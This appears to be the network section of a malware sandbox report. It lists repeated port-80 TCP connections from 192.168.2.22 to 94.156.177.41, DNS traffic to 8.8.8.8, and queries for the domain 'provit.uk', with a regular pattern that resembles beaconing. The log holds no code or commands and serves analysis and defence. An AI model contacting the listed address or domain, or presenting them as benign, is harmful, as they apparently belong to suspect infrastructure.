Nov 21, 2024 01:21:29.018810034 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:29.018877029 CET	49184	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:29.138601065 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.434880972 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.434953928 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.435076952 CET	49184	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:30.435173988 CET	49184	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:30.554763079 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.629609108 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:30.749244928 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.749418974 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:30.774710894 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:30.894450903 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:30.894519091 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:31.014177084 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.330276966 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.330388069 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.330517054 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.330518007 CET	49185	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.450257063 CET	80	49185	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.484519005 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.604202986 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.604413033 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.606748104 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.726404905 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:32.726629972 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:32.846446991 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.180011034 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.180052042 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.180186033 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.181282997 CET	49186	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.300884962 CET	80	49186	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.315700054 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.435399055 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.435502052 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.438380003 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.558198929 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:34.558557987 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:34.678335905 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:35.978378057 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:35.978401899 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:35.978468895 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:35.978544950 CET	49187	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:36.098263025 CET	80	49187	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:36.124655008 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:36.244303942 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:36.244405985 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:36.246083021 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:36.365747929 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:36.365955114 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:36.485713005 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:37.749514103 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:37.749541998 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:37.749717951 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:37.749763966 CET	49188	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:37.869360924 CET	80	49188	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:37.898941994 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:38.018692017 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:38.018867016 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:38.020303965 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:38.139894962 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:38.140042067 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:38.259926081 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.546247005 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.546308041 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.546511889 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:39.546511889 CET	49189	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:39.666300058 CET	80	49189	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.690154076 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:39.809819937 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.809988022 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:39.811778069 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:39.931339025 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:39.931531906 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:40.051386118 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.225311041 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.225622892 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.225671053 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.225723028 CET	49190	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.345210075 CET	80	49190	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.363163948 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.482805967 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.483144045 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.484728098 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.604357004 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:41.604608059 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:41.724311113 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.072159052 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.072217941 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.072411060 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.072411060 CET	49191	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.192054987 CET	80	49191	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.207331896 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.327090979 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.327358961 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.329025984 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.448622942 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:43.448688030 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:43.568276882 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:44.863466024 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:44.863524914 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:44.863574982 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:44.863841057 CET	49192	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:44.983412027 CET	80	49192	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:44.998784065 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:45.118442059 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:45.118674040 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:45.120177984 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:45.241728067 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:45.241866112 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:45.361736059 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:46.668967009 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:46.669171095 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:46.669234037 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:46.787945986 CET	49193	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:46.907622099 CET	80	49193	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:47.080097914 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:47.205775976 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:47.205869913 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:47.252156973 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:47.371897936 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:47.371969938 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:47.491961002 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:48.817509890 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:48.817665100 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:48.818164110 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:48.818218946 CET	49194	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:48.937477112 CET	80	49194	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:48.966336012 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:49.086036921 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:49.086137056 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:49.087871075 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:49.207392931 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:49.207568884 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:49.327981949 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.587418079 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.587451935 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.587584019 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:50.587975979 CET	49195	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:50.707603931 CET	80	49195	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.722498894 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:50.842318058 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.842489004 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:50.844224930 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:50.963939905 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:50.964190960 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:51.083925962 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.457573891 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.457617044 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.457886934 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.457979918 CET	49196	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.577552080 CET	80	49196	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.598395109 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.718280077 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.718491077 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.726937056 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.846908092 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:52.846976042 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:52.966551065 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.325577021 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.325637102 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.325719118 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.325719118 CET	49197	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.445446968 CET	80	49197	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.476116896 CET	49198	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.595861912 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.596087933 CET	49198	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.597784042 CET	49198	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.717308998 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:54.717406034 CET	49198	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:54.836976051 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.127772093 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.127851009 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.127938986 CET	49198	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:56.247574091 CET	80	49198	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.258409977 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:56.378160000 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.378441095 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:56.380079985 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:56.499747992 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:56.499938965 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:56.619820118 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:57.929815054 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:57.929869890 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:57.929941893 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:57.930064917 CET	49199	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:58.050796032 CET	80	49199	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:58.074711084 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:58.194431067 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:58.194580078 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:58.197854996 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:58.317543983 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:58.317708969 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:58.437570095 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:59.701589108 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:59.701643944 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:59.701729059 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:59.703336954 CET	49200	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:59.823478937 CET	80	49200	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:59.831136942 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:59.950783968 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:59.950879097 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:59.952573061 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:00.072396040 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:00.072515965 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:00.192279100 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.372283936 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.372342110 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.372457027 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.372507095 CET	49201	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.492127895 CET	80	49201	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.505882978 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.625454903 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.625598907 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.654943943 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.774487972 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:01.774544954 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:01.894068003 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.169651031 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.169727087 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.169787884 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:03.172641039 CET	49202	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:03.292325974 CET	80	49202	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.671287060 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:03.791064978 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.791181087 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:03.794051886 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:03.913656950 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:03.913789988 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:04.033479929 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.316179991 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.316214085 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.316293955 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.316371918 CET	49203	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.435921907 CET	80	49203	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.464118004 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.583820105 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.584005117 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.589916945 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.709532022 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:05.709669113 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:05.829297066 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.045981884 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.046260118 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.046324968 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.046387911 CET	49204	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.165911913 CET	80	49204	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.200681925 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.320327997 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.320597887 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.326541901 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.446100950 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:07.446181059 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:07.567612886 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:08.721000910 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:08.721055031 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:08.721115112 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:08.732601881 CET	49205	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:08.852320910 CET	80	49205	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:08.926135063 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:09.045958996 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:09.046057940 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:09.047710896 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:09.167490005 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:09.167577028 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:09.287220955 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.458477974 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.458571911 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.458606005 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.458720922 CET	49206	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.578295946 CET	80	49206	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.599745035 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.719356060 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.719598055 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.721070051 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.840580940 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:10.840995073 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:10.960649014 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:12.255867958 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:12.255908966 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:12.256004095 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:12.313508987 CET	49207	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:12.433492899 CET	80	49207	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:13.023102999 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:13.142997980 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:13.143076897 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:13.144752979 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:13.264465094 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:13.264616966 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:13.384274006 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:14.673455000 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:14.673508883 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:14.673610926 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:14.673984051 CET	49208	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:14.793565035 CET	80	49208	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:14.809284925 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:14.929085970 CET	80	49209	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:14.929331064 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:14.930888891 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:15.050951958 CET	80	49209	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:15.051075935 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:15.170713902 CET	80	49209	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:16.519212008 CET	80	49209	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:16.519236088 CET	80	49209	94.156.177.41	192.168.2.22
Nov 21, 2024 01:22:16.519413948 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:16.519639969 CET	49209	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:22:16.639210939 CET	80	49209	94.156.177.41	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 01:20:28.825900078 CET	54562	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:20:29.188765049 CET	53	54562	8.8.8.8	192.168.2.22
Nov 21, 2024 01:20:33.028439045 CET	52917	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:20:33.391810894 CET	53	52917	8.8.8.8	192.168.2.22
Nov 21, 2024 01:20:33.399985075 CET	52917	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:20:33.533752918 CET	53	52917	8.8.8.8	192.168.2.22
Nov 21, 2024 01:20:33.633660078 CET	52917	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:20:33.756114006 CET	53	52917	8.8.8.8	192.168.2.22
Nov 21, 2024 01:20:33.775178909 CET	52917	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:20:33.898008108 CET	53	52917	8.8.8.8	192.168.2.22
Nov 21, 2024 01:21:04.149297953 CET	62751	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:21:04.283046961 CET	53	62751	8.8.8.8	192.168.2.22
Nov 21, 2024 01:21:04.283548117 CET	62751	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:21:04.637976885 CET	53	62751	8.8.8.8	192.168.2.22
Nov 21, 2024 01:21:04.638588905 CET	62751	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:21:04.773153067 CET	53	62751	8.8.8.8	192.168.2.22
Nov 21, 2024 01:21:04.774233103 CET	62751	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:21:04.897454023 CET	53	62751	8.8.8.8	192.168.2.22
Nov 21, 2024 01:21:04.898086071 CET	62751	53	192.168.2.22	8.8.8.8
Nov 21, 2024 01:21:05.032355070 CET	53	62751	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 01:20:28.825900078 CET	192.168.2.22	8.8.8.8	0xa5cd	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.028439045 CET	192.168.2.22	8.8.8.8	0x92c0	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.399985075 CET	192.168.2.22	8.8.8.8	0x92c0	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.633660078 CET	192.168.2.22	8.8.8.8	0x92c0	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.775178909 CET	192.168.2.22	8.8.8.8	0x92c0	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.149297953 CET	192.168.2.22	8.8.8.8	0xa646	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
